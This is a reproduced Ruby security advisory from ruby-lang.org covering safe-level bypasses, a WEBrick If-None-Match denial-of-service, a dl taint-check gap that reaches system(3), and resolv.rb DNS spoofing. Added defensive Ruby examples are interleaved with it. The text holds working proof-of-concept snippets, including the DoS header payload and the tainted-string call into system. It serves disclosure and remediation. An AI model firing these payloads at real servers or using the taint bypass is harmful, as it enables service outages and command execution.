Multiple vulnerabilities in Ruby
Multiple vulnerabilities have been discovered in Ruby. It's recommended that you upgrade to the latest versions.
Details
The following vulnerabilities have been discovered.
Several vulnerabilities in safe level
Several vulnerabilities in safe level have been discovered.
* untrace_var is permitted at safe level 4.
trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
Thread.new do
$SAFE = 4
eval %q{
proc = untrace_var :$VAR
proc.first.call("aaa")
}
end.join
* $PROGRAM_NAME may be modified at safe level 4.
Thread.new do
$SAFE = 4
eval %q{$PROGRAM_NAME.replace "Hello, World!"}
end.join
$PROGRAM_NAME #=> "Hello, World!"
* Insecure methods may be called at safe level 1-3.
class Hello
def world
Thread.new do
$SAFE = 4
msg = "Hello, World!"
def msg.size
self.replace self*10 # replace string
1 # return wrong size
end
msg
end.value
end
end
$SAFE = 1 # or 2, or 3
s = Hello.new.world
if s.kind_of?(String)
puts s if s.size < 20
end
* Syslog operations are permitted at safe level 4.
require 'syslog'
Syslog.open
Thread.new do
$SAFE = 4
eval %q{
Syslog.log(Syslog::LOG_WARNING, "Hello, World!")
Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)
Syslog.info("masked")
Syslog.close
}
end.join
These vulnerabilities were reported by Keita Yamaguchi.
Denial of service vulnerability in WEBrick
WEBrick::HTTP::DefaultFileHandler is vulnerable to a denial of service attack via a specially crafted If-None-Match header.
Example:
require 'webrick'
WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start
Attack:
require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
req = Net::HTTP::Get.new("/passwd")
req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
http.request(req)
}
p res
The request likely won't finish in this universe.
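The payload above is expensive for a header parser that recognises quoted strings with a backtracking regular expression, because every extra quoted element multiplies the number of ways the pattern can be retried. The fix is to split the header in one left-to-right pass, which costs linear time on any input. The following is an added example, not WEBrick's code and not the original pattern: a quote-aware splitter for a comma-separated header value such as If-None-Match, a none_match? check built on it, and a timing helper run against the advisory's attack payload. The names split_header_value, none_match?, attack_payload and split_seconds are chosen here.

```ruby
require 'benchmark'

# Splits a comma-separated header value (e.g. If-None-Match) into its
# elements, honouring quoted strings and backslash escapes inside them.
# One pass over the characters: the cost is linear in the header length
# however the quotes and spaces are arranged, so the attack payload is cheap.
def split_header_value(str)
  parts = []
  cur = +""
  in_quote = false
  escaped = false
  str.each_char do |c|
    if in_quote
      cur << c
      if escaped
        escaped = false      # the character after a backslash is literal
      elsif c == "\\"
        escaped = true
      elsif c == '"'
        in_quote = false     # closing quote
      end
    elsif c == '"'
      in_quote = true        # opening quote: commas inside are not separators
      cur << c
    elsif c == ","
      parts << cur.strip
      cur = +""
    else
      cur << c
    end
  end
  parts << cur.strip
  parts.reject(&:empty?)
end

# If-None-Match semantics for a static file handler: "*" matches any
# current representation, otherwise the header must list the current tag.
# (Weak tags of the form W/"..." are compared as opaque strings here.)
def none_match?(header, current_etag)
  tags = split_header_value(header)
  tags.include?("*") || tags.include?(current_etag)
end

# The advisory's attack payload: meh="" followed by foo="bar" repeated.
def attack_payload(repeats = 100)
  %q{meh=""} + %q{foo="bar" } * repeats
end

# Wall-clock seconds spent splitting a header value.
def split_seconds(str)
  Benchmark.realtime { split_header_value(str) }
end

if $PROGRAM_NAME == __FILE__
  p split_header_value('"a,b", c, "d\"e"')
  p none_match?('"abc", "def"', '"def"')
  printf("%d elements, %.4fs for a %d-byte payload\n",
         split_header_value(attack_payload(10_000)).length,
         split_seconds(attack_payload(10_000)),
         attack_payload(10_000).bytesize)
end
```

The splitter never re-reads a character, so the 100 repeated quoted strings that hang the original handler are handled in a fraction of a millisecond; the timing helper makes that property something a regression test can assert rather than assume.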
This vulnerability was reported by Christian Neukirchen.
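Returning to the insecure-method example in the safe-level section: the root problem is that a String handed back by untrusted code carries a singleton #size that grows the string and reports 1, so a length check made through that method proves nothing. The following is an added example, not code from the advisory or from Ruby itself. It drops $SAFE, which modern Ruby no longer implements, and keeps only the dispatch problem: a naive consumer as in the advisory next to one that rejects per-object method overrides and measures length through String's own implementation. untrusted_string, naive_filter and hardened_filter are names chosen for this example.

```ruby
# Constructed stand-in for the advisory's Hello#world: untrusted code returns
# a String whose #size has been replaced on that one object.
def untrusted_string
  msg = "Hello, World!"
  def msg.size
    replace(self * 10) # side effect: grow the string when its size is asked
    1                  # and report a bogus length
  end
  msg
end

# Naive consumer, as in the advisory: trusts the object's own #size, so the
# check passes and the caller goes on to use a string ten times longer.
def naive_filter(s, limit = 20)
  s.kind_of?(String) && s.size < limit ? s.dup : nil
end

# Hardened consumer: accept only plain String instances with no per-object
# overrides, and measure length via String's real implementation so a lying
# #size defined by the untrusted side is never dispatched to.
def hardened_filter(s, limit = 20)
  return nil unless s.instance_of?(String)               # exact class, no subclasses
  return nil unless s.singleton_methods.empty?            # no singleton overrides
  true_size = String.instance_method(:size).bind_call(s) # bypass any #size override
  true_size < limit ? s.dup : nil                         # dup drops the singleton class
end

if $PROGRAM_NAME == __FILE__
  p naive_filter(untrusted_string)    # 130-character string: the size check lied
  p hardened_filter(untrusted_string) # nil: rejected because #size was overridden
  p hardened_filter("Hello, World!")  # "Hello, World!": clean input still passes
end
```

Rejecting singleton methods is the cheap gate; binding String#size directly is what actually protects the length check, and the same pattern (Klass.instance_method(:m).bind_call(obj)) applies to any method a trust boundary relies on.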
Lack of taintness check in dl
dl doesn't check taintness: at $SAFE >= 1, where tainted (attacker-controlled) strings are supposed to be kept away from dangerous operations, dl still lets them be passed to any native function, so an attacker can reach e.g. system(3):
require 'dl'
$SAFE = 1
h = DL.dlopen(nil)
sys = h.sym('system', 'IP')
uname = 'uname -rs'.taint
sys[uname]
This vulnerability was reported by sheepman.
DNS spoofing vulnerability in resolv.rb
resolv.rb allows remote attackers to spoof DNS answers. The risk can be reduced by randomizing the DNS transaction ID and the UDP source port of each query, so that a forged reply has to guess both, and resolv.rb has been fixed to randomize them.
* see also: CVE-2008-1447
This vulnerability was reported by Tanaka Akira.
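An added example of the mitigation described above, not resolv.rb's own code: the transaction ID is drawn from a CSPRNG, the socket is bound to a randomly chosen unprivileged UDP port (retrying on collision), and a reply is accepted only if its ID matches the query, it is flagged as a response, and it echoes the question that was asked. Together the ID and port give a forger roughly 2^32 combinations to guess instead of 2^16 or fewer. build_query, random_txid, bind_random_port and reply_matches? are names chosen for this example; the query and reply bytes in the usage are constructed inline.

```ruby
require 'securerandom'
require 'socket'

# Minimal DNS query: header with a caller-supplied ID and one A/IN question.
def build_query(name, id)
  header = [id, 0x0100, 1, 0, 0, 0].pack("nnnnnn")   # RD set, QDCOUNT=1
  qname = name.split(".").map { |l| [l.length, l].pack("Ca*") }.join + "\x00".b
  header + qname + [1, 1].pack("nn")                # QTYPE=A, QCLASS=IN
end

# Transaction ID from a CSPRNG rather than a counter or a seeded PRNG.
def random_txid
  SecureRandom.random_number(0x10000)
end

# Bind to a random unprivileged UDP port so the attacker must guess the port
# as well as the ID. Constructed variant of the approach, not resolv.rb's code.
def bind_random_port(sock, host = "127.0.0.1", attempts = 10)
  attempts.times do
    port = 1024 + SecureRandom.random_number(65536 - 1024)
    begin
      sock.bind(host, port)
      return port
    rescue Errno::EADDRINUSE, Errno::EACCES
      next                                          # collision: pick another
    end
  end
  raise "could not find a free port after #{attempts} attempts"
end

# Accept a reply only if its ID matches the query we sent, the QR bit marks it
# as a response, and the question section echoes exactly what we asked.
def reply_matches?(query, reply)
  return false if reply.bytesize < 12 || query.bytesize < 12
  qid, = query.unpack("n")
  rid, rflags, rqd = reply.unpack("nnn")
  return false unless rid == qid                    # transaction ID
  return false unless (rflags & 0x8000) != 0        # QR bit: must be a response
  return false unless rqd == 1                      # one question, as sent
  reply.b[12, query.bytesize - 12] == query.b[12..] # same name, type and class
end

if $PROGRAM_NAME == __FILE__
  id = random_txid
  q = build_query("example.com", id)
  # Constructed replies: one genuine, one with an attacker's guessed ID.
  genuine = [id, 0x8180, 1, 0, 0, 0].pack("nnnnnn") + q.b[12..]
  forged  = [(id + 1) & 0xffff, 0x8180, 1, 0, 0, 0].pack("nnnnnn") + q.b[12..]
  p reply_matches?(q, genuine)   # true
  p reply_matches?(q, forged)    # false
  begin
    sock = UDPSocket.new
    puts "bound to random port #{bind_random_port(sock)}"
    sock.close
  rescue SystemCallError => e
    puts "socket step skipped: #{e.message}"
  end
end
```

Randomization only helps if every query uses a fresh ID and port; reusing one socket for many queries collapses the port half of the guess space back to one value. Validating the echoed question also stops a reply for a different name from being cached against the one that was asked.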
Vulnerable versions
1.8 series
* 1.8.5 and all prior versions
* 1.8.6-p286 and all prior versions
* 1.8.7-p71 and all prior versions
1.9 series
* r18423 and all prior revisions
Solution
1.8 series
Please upgrade to 1.8.6-p287, or 1.8.7-p72.
1.9 series
Please check out the latest version using Subversion.
$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby
Please note that a package that corrects this weakness may already be available through your package management software.
Source : ruby-lang.org